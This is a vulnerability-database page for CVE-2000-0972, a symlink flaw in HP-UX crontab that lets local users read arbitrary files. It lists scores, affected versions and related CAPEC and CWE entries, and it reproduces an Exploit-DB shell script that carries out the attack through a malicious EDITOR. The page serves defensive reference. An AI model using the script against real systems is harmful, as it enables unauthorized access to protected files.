CVE-2000-0972
published 2000-12-19CVE-2000-0972: HP-UX 11.00 crontab allows local users to read arbitrary files via the -e option by creating a symlink to the target file during the crontab session, quitting…
PriorityP414medium5.5CVSS 3.1
AVLACLPRLUINSUCHINAN
EXPLOIT
EPSS
1.28%
66.5th percentile
HP-UX 11.00 crontab allows local users to read arbitrary files via the -e option by creating a symlink to the target file during the crontab session, quitting the session, and reading the error messages that crontab generates.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | hp-ux | — | — |
CVSS provenance
nvdv3.15.5MEDIUMCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP-UX 11.00/10.20 crontab - Overwrite Files
exploitdb·2000-11-19
CVE-2000-0972 HP-UX 11.00/10.20 crontab - Overwrite Files
HP-UX 11.00/10.20 crontab - Overwrite Files
---
#!/bin/sh
#
# HP-UX 11.00/10.20 crontab
#
# Kyong-won,Cho
#
# [email protected]
#
# Usage : ./crontab.sh
#
if [ -z "$1" ]
then
echo "Usage : $0 "
exit
fi
cat /tmp/crontab_exp
#!/bin/sh
ln -sf $1 \$1
_EOF_
chmod 755 /tmp/crontab_exp
EDITOR=/tmp/crontab_exp
export EDITOR
crontab -e 2> /tmp/crontab$$
grep -v "error on previous line" /tmp/crontab$$
rm -f /tmp/crontab_exp /tmp/crontab$$
# milw0rm.com [2000-11-19]
Exploit-DB
HP-UX 10.20/11.0 - crontab '/tmp' File
exploitdb·2000-10-20
CVE-2000-0972 HP-UX 10.20/11.0 - crontab '/tmp' File
HP-UX 10.20/11.0 - crontab '/tmp' File
---
source: https://www.securityfocus.com/bid/1845/info
crontab is a binary in the cron package of the HP-UX cron implementation which allows a user to create a file of scheduled commands. A vulnerabiltiy in crontab exists that allows a user to read any file on an HP-UX system. crontab as implemented with HP-UX is a access controlled binary. Users are permitted to run crontab only if they have an access entry in the crontab.allow file.
To create a crontab, a user must execute the command "crontab -e." Executing this command launches the vi editor, creates a file in the /tmp directory with the ownership delegated to the user running the command. While the file exists in /tmp, the owner of the file may spawn a shell from vi and create a symbolic lin
No writeups or analysis indexed.
CAPEC
Leveraging Race Conditions via Symbolic Links
mitre_capec
[HIGH] Leveraging Race Conditions via Symbolic Links
CAPEC-27: Leveraging Race Conditions via Symbolic Links
This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.
Execution Flow:
S
CWE
Improper Link Resolution Before File Access ('Link Following')
mitre_cwe
CWE-59 Improper Link Resolution Before File Access ('Link Following')
CWE-59: Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
Background: Soft links are a UNIX term that is synonymous with simple shortcuts on Windows-based platforms.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality, Integrity, Access Control. Impact: Read Files or Directories, Modify Files or Directories, Bypass Protection Mechanism. An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpe
CWE
UNIX Symbolic Link (Symlink) Following
mitre_cwe
CWE-61 UNIX Symbolic Link (Symlink) Following
CWE-61: UNIX Symbolic Link (Symlink) Following
The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
A product that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access.
Modes of Introduction:
Phase: Implementation
Note: These are typically reported for temporary files or privileged
2000-12-19
Published